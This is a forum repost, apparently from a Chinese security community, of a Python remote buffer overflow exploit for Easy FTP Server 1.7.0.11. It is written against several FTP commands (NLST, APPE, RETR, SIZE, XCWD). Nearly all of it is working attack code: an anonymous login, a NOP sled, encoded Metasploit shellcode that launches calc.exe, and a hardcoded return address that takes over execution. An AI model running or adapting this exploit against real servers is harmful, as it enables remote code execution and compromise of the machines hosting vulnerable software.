首页
社区
课程
招聘
[转帖]EASYFTP BOF Vulnerabilities in NLST , NLST -al, APPE, RETR , SIZE and XCWD Comman
发表于: 2010-8-11 12:09 3543

[转帖]EASYFTP BOF Vulnerabilities in NLST , NLST -al, APPE, RETR , SIZE and XCWD Comman

2010-8-11 12:09
3543
# Exploit Title: Easy FTP Server v1.7.0.11 NLST , NLST -al, APPE, RETR , SIZE  and XCWD Commands Remote Buffer Overflow Exploit  

# Date: 10/8/2010  

# Author: Rabih Mohsen  

# Software Link:http://code.google.com/p/easyftpsvr/downloads/detail?name=easyftp-server-1.7.0.11-cn.zip  

# Version: 1.7.0.11  

# Tested on: Windows XP SP3   

# CVE:  

   

import socket  

import sys  

   

buffersize = 272

   

# Buffer needed -> 272 bytes  

# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \x00\x0a\x2f\x5c ]  

   

shellcode = ("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1"

"\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5"

"\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69"

"\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e"

"\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8"

"\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08"

"\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c"

"\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c"

"\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80"

"\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b"

"\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84"

"\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14"

"\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c"

"\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e"

"\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8"

"\x51\x6b\x28")  

   

eip = "\x91\xC8\x41\x7E" # CALL EDI - user32.dll  

nopsled = "\x90" * 16

   

payload = "\x90" * (buffersize-(len(nopsled)+len(shellcode)))  

   

# target, CMDS: anny of the "NLST , NLST -al, APPE, RETR , SIZE  and XCWD"  

def GenericEasyFTPExploit(target, CMDS):  

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  

    connect = s.connect((target, 21))  

    s.recv(1024)  

    s.send('User anonymous\r\n')  

    s.recv(1024)  

    s.send('PASS anonymous\r\n')  

    s.send(CMDS +nopsled+shellcode+payload+eip+'\r\n')  

    s.recv(1024)  

    s.send('QUIT EASY ftp\r\n')  

    s.close()  

   

target = sys.argv[1]  

CMDS  =  sys.argv[2]  

   

GenericEasyFTPExploit(target,CMDS)

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//